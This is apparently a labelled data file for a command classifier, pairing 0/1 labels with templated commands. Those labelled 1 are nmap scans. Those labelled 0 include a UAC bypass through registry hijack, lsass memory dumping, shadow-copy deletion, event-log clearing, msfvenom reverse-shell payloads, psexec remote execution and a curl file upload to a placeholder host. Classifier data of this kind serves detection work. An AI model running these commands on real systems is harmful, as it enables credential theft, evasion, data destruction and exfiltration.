1	nmap ${ip_address}
1	nmap ${ip_address} 2> /dev/null
1	nmap ${ip_address} 2> &1
1	nmap ${ip_address} 2> error.log
1	nmap -T5 ${ip_address}
1	nmap -T5 ${ip_address} 2> /dev/null
1	nmap -T5 ${ip_address} 2> &1
1	nmap -T5 ${ip_address} 2> error.log
1	nmap -sP ${ip_address}
1	nmap -sP ${ip_address} 2> /dev/null
1	nmap -sP ${ip_address} 2> &1
1	nmap -sP ${ip_address} 2> error.log
1	nmap -v ${ip_address}
1	nmap -v ${ip_address} 2> /dev/null
1	nmap -v ${ip_address} 2> &1
1	nmap -v ${ip_address} 2> error.log
1	nmap -F ${ip_address}
1	nmap -F ${ip_address} 2> /dev/null
1	nmap -F ${ip_address} 2> &1
1	nmap -F ${ip_address} 2> error.log
1	nmap -sC ${ip_address}
1	nmap -sC ${ip_address} 2> /dev/null
1	nmap -sC ${ip_address} 2> &1
1	nmap -sC ${ip_address} 2> error.log
1	nmap -v -A ${ip_address}
1	nmap -v -A ${ip_address} 2> /dev/null
1	nmap -v -A ${ip_address} 2> &1
1	nmap -v -A ${ip_address} 2> error.log
1	nmap -A ${ip_address}
1	nmap -A ${ip_address} 2> /dev/null
1	nmap -A ${ip_address} 2> &1
1	nmap -A ${ip_address} 2> error.log
1	nmap --open ${ip_address}
1	nmap --open ${ip_address} 2> /dev/null
1	nmap --open ${ip_address} 2> &1
1	nmap --open ${ip_address} 2> error.log
1	nmap -PN ${ip_address}
1	nmap -PN ${ip_address} 2> /dev/null
1	nmap -PN ${ip_address} 2> &1
1	nmap -PN ${ip_address} 2> error.log
1	nmap -sV ${ip_address}
1	nmap -sV ${ip_address} 2> /dev/null
1	nmap -sV ${ip_address} 2> &1
1	nmap -sV ${ip_address} 2> error.log
1	nmap -p- ${ip_address}
1	nmap -p- ${ip_address} 2> /dev/null
1	nmap -p- ${ip_address} 2> &1
1	nmap -p- ${ip_address} 2> error.log
1	nmap -p- -sC ${ip_address}
1	nmap -p- -sC ${ip_address} 2> /dev/null
1	nmap -p- -sC ${ip_address} 2> &1
1	nmap -p- -sC ${ip_address} 2> error.log
1	nmap -p- -sC -sV ${ip_address}
1	nmap -p- -sC -sV ${ip_address} 2> /dev/null
1	nmap -p- -sC -sV ${ip_address} 2> &1
1	nmap -p- -sC -sV ${ip_address} 2> error.log
1	nmap -p- -sC -sV -O ${ip_address}
1	nmap -p- -sC -sV -O ${ip_address} 2> /dev/null
1	nmap -p- -sC -sV -O ${ip_address} 2> &1
1	nmap -p- -sC -sV -O ${ip_address} 2> error.log
1	nmap -p- -sC -sV -O -A ${ip_address}
1	nmap -p- -sC -sV -O -A ${ip_address} 2> /dev/null
1	nmap -p- -sC -sV -O -A ${ip_address} 2> &1
1	nmap -p- -sC -sV -O -A ${ip_address} 2> error.log
0	7z a ${destination_file_path} ${source_file_path} -p
0	powershell -c "certutil -encode -Unicode -gmt error.txt encode.txt"
0	cmd /c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_QWORD_LITTLE_ENDIAN /d 0 /f"
0	cmd /c "mstsc.exe /v:${ip_address} /restrictedAdmin"
0	powershell -c "wmic os get TotalVirtualMemorySize"
0	cmd /c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p${password}"
0	reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_SZ
0	7z a -p ${destination_file_path} ${source_file_path}
0	cmd /c "choco install 7zip"
0	powershell -c "wevtutil clear-log application"
0	vssadmin delete shadows /all /quiet
0	cmd /c "reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_SZ
0	cmd /c "certutil -encode -UnicodeText -v -f error.txt encode.txt"
0	wmic.exe os get Caption
0	powershell -c "procdump.exe -mm lsass.exe lsassdump.dmp"
0	cmd /c "sdelete.exe -s -q -accepteula ${local_file_path}"
0	powershell -c "sdelete -f -q ${local_file_path}"
0	cmd /c "sdelete.exe -s ${local_file_path}"
0	cmd /c "plink -ssh ${username}@${ip_address} -P ${remote_port} -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N"
0	powershell -c "wmic.exe os get TotalVirtualMemorySize"
0	7z a -p ${destination_file_path} ${source_file_path}
0	cmd /c "ipconfig.exe"
0	cmd /c "taskkill /f /im ${process_name}"
0	reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute}
0	cmd /c "plink -ssh -P ${remote_port} -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N"
0	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
0	powershell -c "plink.exe -ssh ${username}@${ip_address} -P ${remote_port} -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N"
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_EXPAND_SZ /f"
0	netstat.exe -r
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute}"
0	sdelete.exe -s ${local_file_path}
0	cmd /c "ipconfig.exe /all"
0	powershell -c "reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_EXPAND_SZ"
0	powershell -c "ipconfig.exe /all"
0	taskkill.exe /im ${process_name} /T
0	msfvenom -p windows/x64/meterpreter/reverse_http LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	cmd /c "rmdir /q /s ${local_file_path}"
0	ipconfig.exe
0	7z.exe a -slp ${destination_file_path} ${source_file_path} -p
0	powershell -c "vssadmin.exe delete shadows /all /Quiet"
0	cmd /c "wevtutil cl security"
0	cmd /c "vssadmin delete shadows /All /quiet"
0	certutil -encode -Unicode -gmt -v -f error.txt encode.txt
0	psexec.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}
0	curl -v -X POST http://${ip_address}/upload -F files=@${source_file_path}
0	certutil -encode -UnicodeText -gmt -f error.txt encode.txt
0	sdelete -q ${local_file_path}
0	powershell -c "ipconfig.exe /allcompartments /all"
0	psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d
0	powershell -c "choco install -y winscp"
0	cmd /c "choco install 7zip"
0	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
0	vssadmin create shadow /for=C:
0	cmd /c "7z a -slt -p ${destination_file_path} ${source_file_path}"
0	del ${local_file_path}
0	powershell -c "7z a ${destination_file_path} ${source_file_path} -p${password}"
0	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d"
0	cmd /c "del /q /p ${local_file_path}"
0	msfvenom -p windows/meterpreter_reverse_tcp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	rm -rf ${local_file_path} 2> &1
0	procdump -accepteula -mm lsass lsassdump.dmp
0	cmd /c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
0	powershell -c "del /f ${local_file_path}"
0	cmd /c "choco install -f ngrok"
